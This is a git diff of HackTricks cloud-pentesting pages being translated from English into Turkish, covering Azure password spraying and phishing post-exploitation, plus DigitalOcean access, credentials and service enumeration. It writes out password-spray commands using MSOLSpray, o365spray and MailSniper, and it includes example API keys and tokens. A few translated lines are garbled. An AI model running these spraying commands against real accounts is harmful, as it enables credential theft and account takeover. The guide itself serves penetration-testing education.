- [**365-Stealer**](https://github.com/AlteredSecurity/365-Stealer)**:** Check [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) to learn how to configure it.
- [**365-Stealer**](https://github.com/AlteredSecurity/365-Stealer)**:** Bunu yapılandırmayı öğrenmek için [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) adresini kontrol edin.
- [**O365-Attack-Toolkit**](https://github.com/mdsecactivebreach/o365-attack-toolkit)
## Post-Exploitation
## Sonrası-İstismar
### Phishing Post-Exploitation
### Phishing Sonrası-İstismar
Depending on the requested permissions you might be able to **access different data of the tenant** (list users, groups... or even modify settings) and **information of the user** (files, notes, emails...). Then, you can use this permissions to perform those actions.
İstenen izinlere bağlı olarak, **kiracının farklı verilerine erişim sağlayabilirsiniz** (kullanıcıları, grupları listeleme... veya hatta ayarları değiştirme) ve **kullanıcının bilgilerine** (dosyalar, notlar, e-postalar...) erişebilirsiniz. Ardından, bu izinleri bu eylemleri gerçekleştirmek için kullanabilirsiniz.
### Application Post Exploitation
### Uygulama Sonrası İstismar
Check the Applications and Service Principal sections of the page:
Sayfanın Uygulamalar ve Hizmet Prensibi bölümlerini kontrol edin:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/
{{#endref}}
## References
## Referanslar
- [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer)
- [https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/)
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md
View File

@@ -4,25 +4,20 @@
## Password Spray
In **Azure** this can be done against **different API endpoints** like Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc.
**Azure** üzerinde bu, **farklı API uç noktalarına** karşı yapılabilir; Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice vb.
However, note that this technique is **very noisy** and Blue Team can **easily catch it**. Moreover, **forced password complexity** and the use of **MFA** can make this technique kind of useless.
You can perform a password spray attack with [**MSOLSpray**](https://github.com/dafthack/MSOLSpray)
Ancak, bu tekniğin **çok gürültülü** olduğunu ve Blue Team'in bunu **kolayca yakalayabileceğini** unutmayın. Ayrıca, **zorunlu şifre karmaşıklığı** ve **MFA** kullanımı bu tekniği neredeyse işe yaramaz hale getirebilir.
Bir şifre püskürtme saldırısını [**MSOLSpray**](https://github.com/dafthack/MSOLSpray) ile gerçekleştirebilirsiniz.
```powershell
. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose
```
Or with [**o365spray**](https://github.com/0xZDH/o365spray)
Ya da [**o365spray**](https://github.com/0xZDH/o365spray) ile
```bash
python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com
```
Or with [**MailSniper**](https://github.com/dafthack/MailSniper)
Ya da [**MailSniper**](https://github.com/dafthack/MailSniper) ile
```powershell
#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
@@ -31,9 +26,4 @@ Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
```
{{#include ../../../banners/hacktricks-training.md}}

22
src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
View File

@@ -2,22 +2,21 @@
{{#include ../../../banners/hacktricks-training.md}}
## Virtual Machines
## Sanal Makineler
For more info about Azure Virtual Machines check:
Azure Sanal Makineleri hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/vms/
{{#endref}}
### Exposed vulnerable service
### ık hassas hizmet
A network service that is vulnerable to some RCE.
Bazı RCE'lere karşı savunmasız bir ağ hizmeti.
### Public Gallery Images
A public image might have secrets inside of it:
### Kamu Galerisi Görüntüleri
Bir kamu görüntüsü içinde gizli bilgiler olabilir:
```bash
# List all community galleries
az sig list-community --output table
@@ -25,11 +24,9 @@ az sig list-community --output table
# Search by publisherUri
az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']"
```
### Public Extensions
This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it:
Bu daha garip olurdu ama imkansız değil. Büyük bir şirket, içinde hassas veriler bulunan bir uzantı koyabilir:
```bash
# It takes some mins to run
az vm extension image list --output table
@@ -37,9 +34,4 @@ az vm extension image list --output table
# Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table
```
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/digital-ocean-pentesting/README.md
View File

@@ -2,17 +2,17 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
**Before start pentesting** a Digital Ocean environment there are a few **basics things you need to know** about how DO works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
**Pentesting'e başlamadan önce** bir Digital Ocean ortamında, ne yapmanız gerektiğini, yanlış yapılandırmaları nasıl bulacağınızı ve bunları nasıl istismar edeceğinizi anlamanıza yardımcı olacak bazı **temel bilgileri bilmeniz gerekir**.
Concepts such as hierarchy, access and other basic concepts are explained in:
Hiyerarşi, erişim ve diğer temel kavramlar gibi kavramlar şunlarda açıklanmaktadır:
{{#ref}}
do-basic-information.md
{{#endref}}
## Basic Enumeration
## Temel Sayım
### SSRF
@@ -20,28 +20,22 @@ do-basic-information.md
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
{{#endref}}
### Projects
### Projeler
To get a list of the projects and resources running on each of them from the CLI check:
CLI'den her birinde çalışan projelerin ve kaynakların bir listesini almak için kontrol edin:
{{#ref}}
do-services/do-projects.md
{{#endref}}
### Whoami
```bash
doctl account get
```
## Services Enumeration
## Hizmetlerin Sayımı
{{#ref}}
do-services/
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

130
src/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md
View File

@@ -1,139 +1,127 @@
# DO - Basic Information
# DO - Temel Bilgiler
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
DigitalOcean is a **cloud computing platform that provides users with a variety of services**, including virtual private servers (VPS) and other resources for building, deploying, and managing applications. **DigitalOcean's services are designed to be simple and easy to use**, making them **popular among developers and small businesses**.
DigitalOcean, kullanıcılara sanal özel sunucular (VPS) ve uygulama oluşturma, dağıtma ve yönetme için diğer kaynaklar dahil olmak üzere çeşitli hizmetler sunan bir **bulut bilişim platformudur**. **DigitalOcean'un hizmetleri basit ve kullanımı kolay olacak şekilde tasarlanmıştır**, bu da onları **geliştiriciler ve küçük işletmeler arasında popüler hale getirmektedir**.
Some of the key features of DigitalOcean include:
DigitalOcean'un bazı ana özellikleri şunlardır:
- **Virtual private servers (VPS)**: DigitalOcean provides VPS that can be used to host websites and applications. These VPS are known for their simplicity and ease of use, and can be quickly and easily deployed using a variety of pre-built "droplets" or custom configurations.
- **Storage**: DigitalOcean offers a range of storage options, including object storage, block storage, and managed databases, that can be used to store and manage data for websites and applications.
- **Development and deployment tools**: DigitalOcean provides a range of tools that can be used to build, deploy, and manage applications, including APIs and pre-built droplets.
- **Security**: DigitalOcean places a strong emphasis on security, and offers a range of tools and features to help users keep their data and applications safe. This includes encryption, backups, and other security measures.
- **Sanal özel sunucular (VPS)**: DigitalOcean, web siteleri ve uygulamaları barındırmak için kullanılabilecek VPS'ler sağlar. Bu VPS'ler, basitlikleri ve kullanım kolaylıkları ile bilinir ve çeşitli önceden oluşturulmuş "damlalar" veya özel yapılandırmalar kullanılarak hızlı ve kolay bir şekilde dağıtılabilir.
- **Depolama**: DigitalOcean, web siteleri ve uygulamalar için veri depolamak ve yönetmek amacıyla kullanılabilecek nesne depolama, blok depolama ve yönetilen veritabanları dahil olmak üzere çeşitli depolama seçenekleri sunar.
- **Geliştirme ve dağıtım araçları**: DigitalOcean, uygulamaları oluşturmak, dağıtmak ve yönetmek için kullanılabilecek API'ler ve önceden oluşturulmuş damlalar dahil olmak üzere çeşitli araçlar sağlar.
- **Güvenlik**: DigitalOcean, güvenliğe büyük önem verir ve kullanıcıların verilerini ve uygulamalarını güvende tutmalarına yardımcı olmak için çeşitli araçlar ve özellikler sunar. Bu, şifreleme, yedeklemeler ve diğer güvenlik önlemlerini içerir.
Overall, DigitalOcean is a cloud computing platform that provides users with the tools and resources they need to build, deploy, and manage applications in the cloud. Its services are designed to be simple and easy to use, making them popular among developers and small businesses.
Genel olarak, DigitalOcean, kullanıcılara bulutta uygulama oluşturma, dağıtma ve yönetme için ihtiyaç duydukları araçları ve kaynakları sağlayan bir bulut bilişim platformudur. Hizmetleri basit ve kullanımı kolay olacak şekilde tasarlanmıştır, bu da onları geliştiriciler ve küçük işletmeler arasında popüler hale getirmektedir.
### Main Differences from AWS
### AWS ile Ana Farklar
One of the main differences between DigitalOcean and AWS is the **range of services they offer**. **DigitalOcean focuses on providing simple** and easy-to-use virtual private servers (VPS), storage, and development and deployment tools. **AWS**, on the other hand, offers a **much broader range of services**, including VPS, storage, databases, machine learning, analytics, and many other services. This means that AWS is more suitable for complex, enterprise-level applications, while DigitalOcean is more suited to small businesses and developers.
DigitalOcean ile AWS arasındaki ana farklardan biri, **sundukları hizmetlerin kapsamıdır**. **DigitalOcean, basit** ve kullanımı kolay sanal özel sunucular (VPS), depolama ve geliştirme ve dağıtım araçları sağlamaya odaklanır. **AWS** ise, VPS, depolama, veritabanları, makine öğrenimi, analiz ve birçok diğer hizmet dahil olmak üzere **çok daha geniş bir hizmet yelpazesi** sunar. Bu, AWS'nin karmaşık, kurumsal düzeyde uygulamalar için daha uygun olduğu, DigitalOcean'un ise küçük işletmeler ve geliştiriciler için daha uygun olduğu anlamına gelir.
Another key difference between the two platforms is the **pricing structure**. **DigitalOcean's pricing is generally more straightforward and easier** to understand than AWS, with a range of pricing plans that are based on the number of droplets and other resources used. AWS, on the other hand, has a more complex pricing structure that is based on a variety of factors, including the type and amount of resources used. This can make it more difficult to predict costs when using AWS.
İki platform arasındaki bir diğer önemli fark ise **fiyatlandırma yapısıdır**. **DigitalOcean'un fiyatlandırması genellikle daha basit ve anlaşılması daha kolaydır**; damla sayısına ve kullanılan diğer kaynaklara dayanan çeşitli fiyatlandırma planları vardır. Öte yandan, AWS, kullanılan kaynakların türü ve miktarı gibi çeşitli faktörlere dayanan daha karmaşık bir fiyatlandırma yapısına sahiptir. Bu, AWS kullanırken maliyetleri tahmin etmeyi daha zor hale getirebilir.
## Hierarchy
## Hiyerarşi
### User
### Kullanıcı
A user is what you expect, a user. He can **create Teams** and **be a member of different teams.**
Bir kullanıcı, beklediğiniz gibi bir kullanıcıdır. **Takımlar oluşturabilir** ve **farklı takımlarda üye olabilir.**
### **Team**
### **Takım**
A team is a group of **users**. When a user creates a team he has the **role owner on that team** and he initially **sets up the billing info**. **Other** user can then be **invited** to the team.
Bir takım, **kullanıcılardan** oluşan bir gruptur. Bir kullanıcı bir takım oluşturduğunda, o takımda **sahip rolüne** sahiptir ve başlangıçta **faturalama bilgilerini ayarlar**. **Diğer** kullanıcılar daha sonra takıma **davet edilebilir**.
Inside the team there might be several **projects**. A project is just a **set of services running**. It can be used to **separate different infra stages**, like prod, staging, dev...
Takım içinde birkaç **proje** olabilir. Bir proje, sadece bir **hizmet setidir**. Farklı altyapı aşamalarını ayırmak için kullanılabilir, örneğin prod, staging, dev...
### Project
### Proje
As explained, a project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\
A Digital Ocean project is very similar to a GCP project without IAM.
Açıklandığı gibi, bir proje, içindeki tüm **hizmetler** (damlalar, alanlar, veritabanları, kubernetes...) için bir konteynırdır.\
Bir Digital Ocean projesi, IAM olmadan bir GCP projesine çok benzer.
## Permissions
## İzinler
### Team
### Takım
Basically all members of a team have **access to the DO resources in all the projects created within the team (with more or less privileges).**
Temelde, bir takımın tüm üyeleri, takım içinde oluşturulan tüm projelerde **DO kaynaklarına erişime sahiptir (daha az veya daha fazla ayrıcalıkla).**
### Roles
### Roller
Each **user inside a team** can have **one** of the following three **roles** inside of it:
Bir **takım içindeki her kullanıcı**, aşağıdaki üç **rolden birine** sahip olabilir:
| Role | Shared Resources | Billing Information | Team Settings |
| Rol | Paylaşılan Kaynaklar | Faturalama Bilgileri | Takım Ayarları |
| ---------- | ---------------- | ------------------- | ------------- |
| **Owner** | Full access | Full access | Full access |
| **Biller** | No access | Full access | No access |
| **Member** | Full access | No access | No access |
| **Sahip** | Tam erişim | Tam erişim | Tam erişim |
| **Faturalandırıcı** | Erişim yok | Tam erişim | Erişim yok |
| **Üye** | Tam erişim | Erişim yok | Erişim yok |
**Owner** and **member can list the users** and check their **roles** (biller cannot).
**Sahip** ve **üye, kullanıcıları listeleyebilir** ve **rollerini** kontrol edebilir (faturalandırıcı bunu yapamaz).
## Access
## Erişim
### Username + password (MFA)
### Kullanıcı adı + şifre (MFA)
As in most of the platforms, in order to access to the GUI you can use a set of **valid username and password** to **access** the cloud **resources**. Once logged in you can see **all the teams you are part** of in [https://cloud.digitalocean.com/account/profile](https://cloud.digitalocean.com/account/profile).\
And you can see all your activity in [https://cloud.digitalocean.com/account/activity](https://cloud.digitalocean.com/account/activity).
Çoğu platformda olduğu gibi, GUI'ye erişmek için geçerli bir **kullanıcı adı ve şifre** seti kullanabilirsiniz. **Bulut kaynaklarına erişmek** için. Giriş yaptıktan sonra, [https://cloud.digitalocean.com/account/profile](https://cloud.digitalocean.com/account/profile) adresinde **parçası olduğunuz tüm takımları** görebilirsiniz.\
Ve tüm etkinliğinizi [https://cloud.digitalocean.com/account/activity](https://cloud.digitalocean.com/account/activity) adresinde görebilirsiniz.
**MFA** can be **enabled** in a user and **enforced** for all the users in a **team** to access the team.
**MFA**, bir kullanıcıda **etkinleştirilebilir** ve takımın tüm kullanıcıları için **zorunlu hale getirilebilir**.
### API keys
In order to use the API, users can **generate API keys**. These will always come with Read permissions but **Write permission are optional**.\
The API keys look like this:
### API anahtarları
API'yi kullanmak için kullanıcılar **API anahtarları oluşturabilir**. Bunlar her zaman Okuma izinleri ile gelir, ancak **Yazma izinleri isteğe bağlıdır**.\
API anahtarları şu şekilde görünür:
```
dop_v1_1946a92309d6240274519275875bb3cb03c1695f60d47eaa1532916502361836
```
The cli tool is [**doctl**](https://github.com/digitalocean/doctl#installing-doctl). Initialise it (you need a token) with:
The cli tool is [**doctl**](https://github.com/digitalocean/doctl#installing-doctl). Bunu başlatın (bir token'a ihtiyacınız var):
```bash
doctl auth init # Asks for the token
doctl auth init --context my-context # Login with a different token
doctl auth list # List accounts
```
Varsayılan olarak bu token, Mac'te `/Users/<username>/Library/Application Support/doctl/config.yaml` dosyasına düz metin olarak yazılacaktır.
By default this token will be written in clear-text in Mac in `/Users/<username>/Library/Application Support/doctl/config.yaml`.
### Spaces erişim anahtarları
### Spaces access keys
These are keys that give **access to the Spaces** (like S3 in AWS or Storage in GCP).
They are composed by a **name**, a **keyid** and a **secret**. An example could be:
Bunlar, **Spaces'a erişim** sağlayan anahtarlardır (AWS'deki S3 veya GCP'deki Storage gibi).
Bir **isim**, bir **keyid** ve bir **secret**'ten oluşurlar. Bir örnek şöyle olabilir:
```
Name: key-example
Keyid: DO00ZW4FABSGZHAABGFX
Secret: 2JJ0CcQZ56qeFzAJ5GFUeeR4Dckarsh6EQSLm87MKlM
```
### OAuth Uygulaması
### OAuth Application
OAuth uygulamalarına **Digital Ocean üzerinde erişim verilebilir**.
OAuth applications can be granted **access over Digital Ocean**.
[https://cloud.digitalocean.com/account/api/applications](https://cloud.digitalocean.com/account/api/applications) adresinde **OAuth uygulamaları oluşturmak** mümkündür ve [https://cloud.digitalocean.com/account/api/access](https://cloud.digitalocean.com/account/api/access) adresinde tüm **izin verilen OAuth uygulamalarını** kontrol edebilirsiniz.
It's possible to **create OAuth applications** in [https://cloud.digitalocean.com/account/api/applications](https://cloud.digitalocean.com/account/api/applications) and check all **allowed OAuth applications** in [https://cloud.digitalocean.com/account/api/access](https://cloud.digitalocean.com/account/api/access).
### SSH Anahtarları
### SSH Keys
[https://cloud.digitalocean.com/account/security](https://cloud.digitalocean.com/account/security) adresindeki **konsoldan bir Digital Ocean Takımına** **SSH anahtarları eklemek** mümkündür.
It's possible to add **SSH keys to a Digital Ocean Team** from the **console** in [https://cloud.digitalocean.com/account/security](https://cloud.digitalocean.com/account/security).
Bu şekilde, eğer **yeni bir droplet oluşturursanız, SSH anahtarı** ona ayarlanacak ve **şifresiz SSH ile giriş yapabileceksiniz** (güvenlik nedenleriyle [yeni yüklenen SSH anahtarlarının mevcut droplet'lerde ayarlanmadığını](https://docs.digitalocean.com/products/droplets/how-to/add-ssh-keys/to-existing-droplet/) unutmayın).
This way, if you create a **new droplet, the SSH key will be set** on it and you will be able to **login via SSH** without password (note that newly [uploaded SSH keys aren't set in already existent droplets for security reasons](https://docs.digitalocean.com/products/droplets/how-to/add-ssh-keys/to-existing-droplet/)).
### Functions Authentication Token
The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like:
### Fonksiyon Kimlik Doğrulama Token'ı
**REST API aracılığıyla bir fonksiyonu tetikleme** yöntemi (her zaman etkin, cli'nin kullandığı yöntem) bir **kimlik doğrulama token'ı** ile bir istek tetiklemektir:
```bash
curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \
-H "Content-Type: application/json" \
-H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg="
-H "Content-Type: application/json" \
-H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg="
```
## Logs
### User logs
### Kullanıcı logları
The **logs of a user** can be found in [**https://cloud.digitalocean.com/account/activity**](https://cloud.digitalocean.com/account/activity)
Bir **kullanıcının logları** [**https://cloud.digitalocean.com/account/activity**](https://cloud.digitalocean.com/account/activity) adresinde bulunabilir.
### Team logs
### Takım logları
The **logs of a team** can be found in [**https://cloud.digitalocean.com/account/security**](https://cloud.digitalocean.com/account/security)
Bir **takımın logları** [**https://cloud.digitalocean.com/account/security**](https://cloud.digitalocean.com/account/security) adresinde bulunabilir.
## References
## Referanslar
- [https://docs.digitalocean.com/products/teams/how-to/manage-membership/](https://docs.digitalocean.com/products/teams/how-to/manage-membership/)
{{#include ../../banners/hacktricks-training.md}}

8
src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
View File

@@ -1,11 +1,7 @@
# DO - Permissions for a Pentest
# DO - Pentest için İzinler
{{#include ../../banners/hacktricks-training.md}}
DO doesn't support granular permissions. So the **minimum role** that allows a user to review all the resources is **member**. A pentester with this permission will be able to perform harmful activities, but it's what it's.
DO, ayrıntılı izinleri desteklemiyor. Bu nedenle, bir kullanıcının tüm kaynakları gözden geçirmesine izin veren **minimum rol** **üye**dir. Bu izne sahip bir pentester zararlı faaliyetler gerçekleştirebilir, ama durum bu.
{{#include ../../banners/hacktricks-training.md}}

28
src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
View File

@@ -1,23 +1,19 @@
# DO - Services
# DO - Hizmetler
{{#include ../../../banners/hacktricks-training.md}}
DO offers a few services, here you can find how to **enumerate them:**
DO birkaç hizmet sunmaktadır, burada **bunları nasıl sıralayacağınızı** bulabilirsiniz:
- [**Apps**](do-apps.md)
- [**Container Registry**](do-container-registry.md)
- [**Databases**](do-databases.md)
- [**Droplets**](do-droplets.md)
- [**Functions**](do-functions.md)
- [**Images**](do-images.md)
- [**Uygulamalar**](do-apps.md)
- [**Konteyner Kaydı**](do-container-registry.md)
- [**Veritabanları**](do-databases.md)
- [**Damlalar**](do-droplets.md)
- [**Fonksiyonlar**](do-functions.md)
- [**Görüntüler**](do-images.md)
- [**Kubernetes (DOKS)**](do-kubernetes-doks.md)
- [**Networking**](do-networking.md)
- [**Projects**](do-projects.md)
- [**Spaces**](do-spaces.md)
- [**Volumes**](do-volumes.md)
- [****](do-networking.md)
- [**Projeler**](do-projects.md)
- [**Alanlar**](do-spaces.md)
- [**Hacimler**](do-volumes.md)
{{#include ../../../banners/hacktricks-training.md}}

24
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
View File

@@ -2,18 +2,17 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
[From the docs:](https://docs.digitalocean.com/glossary/app-platform/) App Platform is a Platform-as-a-Service (PaaS) offering that allows developers to **publish code directly to DigitalOcean** servers without worrying about the underlying infrastructure.
[Belgelerden:](https://docs.digitalocean.com/glossary/app-platform/) App Platform, geliştiricilerin **kodlarını doğrudan DigitalOcean** sunucularına yayınlamalarına olanak tanıyan bir Platform-as-a-Service (PaaS) sunumudur; altyapı hakkında endişelenmeden.
You can run code directly from **github**, **gitlab**, **docker hub**, **DO container registry** (or a sample app).
Kodunuzu **github**, **gitlab**, **docker hub**, **DO container registry** (veya bir örnek uygulama) üzerinden doğrudan çalıştırabilirsiniz.
When defining an **env var** you can set it as **encrypted**. The only way to **retreive** its value is executing **commands** inside the host runnig the app.
Bir **env var** tanımlarken, onu **şifreli** olarak ayarlayabilirsiniz. Değerini **geri almak** için tek yol, uygulamayı çalıştıran ana bilgisayar içinde **komutlar** yürütmektir.
An **App URL** looks like this [https://dolphin-app-2tofz.ondigitalocean.app](https://dolphin-app-2tofz.ondigitalocean.app)
Bir **App URL** şu şekilde görünür: [https://dolphin-app-2tofz.ondigitalocean.app](https://dolphin-app-2tofz.ondigitalocean.app)
### Enumeration
```bash
doctl apps list # You should get URLs here
doctl apps spec get <app-id> # Get yaml (including env vars, might be encrypted)
@@ -21,18 +20,13 @@ doctl apps logs <app-id> # Get HTTP logs
doctl apps list-alerts <app-id> # Get alerts
doctl apps list-regions # Get available regions and the default one
```
> [!CAUTION]
> **Apps doesn't have metadata endpoint**
> **Uygulamalar metadata uç noktasına sahip değildir**
### RCE & Encrypted env vars
### RCE & Şifreli çevresel değişkenler
To execute code directly in the container executing the App you will need **access to the console** and go to **`https://cloud.digitalocean.com/apps/<app-id>/console/<app-name>`**.
Uygulamayı çalıştıran konteynerde doğrudan kod çalıştırmak için **konsola erişim** sağlamanız ve **`https://cloud.digitalocean.com/apps/<app-id>/console/<app-name>`** adresine gitmeniz gerekecek.
That will give you a **shell**, and just executing **`env`** you will be able to see **all the env vars** (including the ones defined as **encrypted**).
Bu size bir **shell** verecek ve sadece **`env`** komutunu çalıştırarak **tüm çevresel değişkenleri** (şifreli olarak tanımlananlar dahil) görebileceksiniz.
{{#include ../../../banners/hacktricks-training.md}}

18
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
View File

@@ -2,14 +2,13 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
DigitalOcean Container Registry is a service provided by DigitalOcean that **allows you to store and manage Docker images**. It is a **private** registry, which means that the images that you store in it are only accessible to you and users that you grant access to. This allows you to securely store and manage your Docker images, and use them to deploy containers on DigitalOcean or any other environment that supports Docker.
DigitalOcean Container Registry, **Docker görüntülerini depolamanıza ve yönetmenize olanak tanıyan** bir hizmettir. Bu, **özel** bir kayıt defteridir, bu da depoladığınız görüntülerin yalnızca sizin ve erişim verdiğiniz kullanıcıların erişimine açık olduğu anlamına gelir. Bu, Docker görüntülerinizi güvenli bir şekilde depolamanıza ve yönetmenize olanak tanır ve bunları DigitalOcean'da veya Docker'ı destekleyen herhangi bir ortamda konteynerleri dağıtmak için kullanabilirsiniz.
When creating a Container Registry it's possible to **create a secret with pull images access (read) over it in all the namespaces** of Kubernetes clusters.
### Connection
Bir Container Registry oluştururken, Kubernetes kümelerinin tüm ad alanlarında **görüntüleri çekme erişimi (okuma) ile bir gizli anahtar oluşturmak** mümkündür.
### Bağlantı
```bash
# Using doctl
doctl registry login
@@ -19,9 +18,7 @@ docker login registry.digitalocean.com
Username: <paste-api-token>
Password: <paste-api-token>
```
### Enumeration
### Sayım
```bash
# Get creds to access the registry from the API
doctl registry docker-config
@@ -29,9 +26,4 @@ doctl registry docker-config
# List
doctl registry repository list-v2
```
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md
View File

@@ -2,22 +2,19 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
With DigitalOcean Databases, you can easily **create and manage databases in the cloud** without having to worry about the underlying infrastructure. The service offers a variety of database options, including **MySQL**, **PostgreSQL**, **MongoDB**, and **Redis**, and provides tools for administering and monitoring your databases. DigitalOcean Databases is designed to be highly scalable, reliable, and secure, making it an ideal choice for powering modern applications and websites.
DigitalOcean Veritabanları ile, temel altyapı hakkında endişelenmeden **bulutta veritabanları oluşturabilir ve yönetebilirsiniz**. Hizmet, **MySQL**, **PostgreSQL**, **MongoDB** ve **Redis** dahil olmak üzere çeşitli veritabanı seçenekleri sunar ve veritabanlarınızı yönetmek ve izlemek için araçlar sağlar. DigitalOcean Veritabanları, modern uygulamaları ve web sitelerini desteklemek için ideal bir seçim olan yüksek ölçeklenebilir, güvenilir ve güvenli olacak şekilde tasarlanmıştır.
### Connections details
### Bağlantı detayları
When creating a database you can select to configure it **accessible from a public network**, or just from inside a **VPC**. Moreover, it request you to **whitelist IPs that can access it** (your IPv4 can be one).
The **host**, **port**, **dbname**, **username**, and **password** are shown in the **console**. You can even download the AD certificate to connect securely.
Bir veritabanı oluştururken, **kamusal bir ağdan erişilebilir** olacak şekilde yapılandırmayı seçebilir veya sadece bir **VPC** içinden erişim sağlayabilirsiniz. Ayrıca, **erişebilecek IP'leri beyaz listeye almanızı** ister (IPv4'ünüz biri olabilir).
**host**, **port**, **dbname**, **username** ve **password** **konsolda** gösterilir. Güvenli bir şekilde bağlanmak için AD sertifikasını bile indirebilirsiniz.
```bash
sql -h db-postgresql-ams3-90864-do-user-2700959-0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060
```
### Enumeration
### Sayım
```bash
# Databse clusters
doctl databases list
@@ -39,9 +36,4 @@ doctl databases backups <db-id> # List backups of DB
# Pools
doctl databases pool list <db-id> # List pools of DB
```
{{#include ../../../banners/hacktricks-training.md}}

46
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md
View File

@@ -2,47 +2,46 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
In DigitalOcean, a "droplet" is a v**irtual private server (VPS)** that can be used to host websites and applications. A droplet is a **pre-configured package of computing resources**, including a certain amount of CPU, memory, and storage, that can be quickly and easily deployed on DigitalOcean's cloud infrastructure.
DigitalOcean'da, "droplet", web siteleri ve uygulamaları barındırmak için kullanılabilen bir **sanaldır özel sunucu (VPS)**'dir. Bir droplet, DigitalOcean'ın bulut altyapısında hızlı ve kolay bir şekilde dağıtılabilen belirli bir miktar CPU, bellek ve depolama içeren **önceden yapılandırılmış bir hesaplama kaynakları paketidir**.
You can select from **common OS**, to **applications** already running (such as WordPress, cPanel, Laravel...), or even upload and use **your own images**.
**Yaygın işletim sistemleri** veya **zaten çalışan uygulamalar** (örneğin WordPress, cPanel, Laravel...) arasından seçim yapabilir veya **kendi görüntülerinizi** yükleyip kullanabilirsiniz.
Droplets support **User data scripts**.
Droplet'ler **Kullanıcı veri betikleri**'ni destekler.
<details>
<summary>Difference between a snapshot and a backup</summary>
<summary>Snapshot ve yedekleme arasındaki fark</summary>
In DigitalOcean, a snapshot is a point-in-time copy of a Droplet's disk. It captures the state of the Droplet's disk at the time the snapshot was taken, including the operating system, installed applications, and all the files and data on the disk.
DigitalOcean'da, bir snapshot, bir Droplet'in diskine ait zaman noktası kopyasıdır. Snapshot alındığı anda Droplet'in diskindeki durumu, işletim sistemi, kurulu uygulamalar ve disk üzerindeki tüm dosyalar ve veriler dahil olmak üzere yakalar.
Snapshots can be used to create new Droplets with the same configuration as the original Droplet, or to restore a Droplet to the state it was in when the snapshot was taken. Snapshots are stored on DigitalOcean's object storage service, and they are incremental, meaning that only the changes since the last snapshot are stored. This makes them efficient to use and cost-effective to store.
Snapshot'lar, orijinal Droplet ile aynı yapılandırmaya sahip yeni Droplet'ler oluşturmak veya bir Droplet'i snapshot alındığı zamandaki duruma geri yüklemek için kullanılabilir. Snapshot'lar, DigitalOcean'ın nesne depolama hizmetinde saklanır ve artımlıdır, yani yalnızca son snapshot'tan bu yana yapılan değişiklikler saklanır. Bu, kullanım açısından verimli ve depolama açısından maliyet etkin hale getirir.
On the other hand, a backup is a complete copy of a Droplet, including the operating system, installed applications, files, and data, as well as the Droplet's settings and metadata. Backups are typically performed on a regular schedule, and they capture the entire state of a Droplet at a specific point in time.
Diğer yandan, bir yedekleme, bir Droplet'in işletim sistemi, kurulu uygulamalar, dosyalar ve veriler ile birlikte, ayrıca Droplet'in ayarları ve meta verilerini içeren tam bir kopyasıdır. Yedeklemeler genellikle düzenli bir program dahilinde gerçekleştirilir ve belirli bir zaman noktasında bir Droplet'in tüm durumunu yakalar.
